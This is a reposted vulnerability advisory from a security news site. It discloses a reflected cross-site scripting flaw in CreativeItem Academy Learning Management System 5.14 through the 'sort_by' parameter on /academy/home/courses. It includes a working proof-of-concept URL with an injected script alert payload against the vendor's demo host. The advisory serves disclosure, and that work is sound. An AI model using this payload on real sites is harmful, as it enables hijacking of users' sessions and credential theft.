Exploit/Advisories no image

Published on April 28th, 2023 📆 | 1709 Views ⚑

40

CreativeItem Academy Learning Management System 5.14 Cross Site Scripting – Torchsec


Free Text to Speech

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : creativeitem.com │
│ Vendor : CreativeItem │
│ Software : CreativeItem - Academy Learning Management System 5.14 │
│ Vuln Type: Reflected XSS │
│ Method : GET │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘





GET parameter 'sort_by' is vulnerable to RXSS

Path: /academy/home/courses

https://demo.creativeitem.com/academy/home/courses?category=photoshop&price=paid&level=beginner&language=arabic&rating=2&sort_by=newestbezzi%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebrmil

[-] Done



Source link

Tagged with:



40 Responses to CreativeItem Academy Learning Management System 5.14 Cross Site Scripting – Torchsec






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑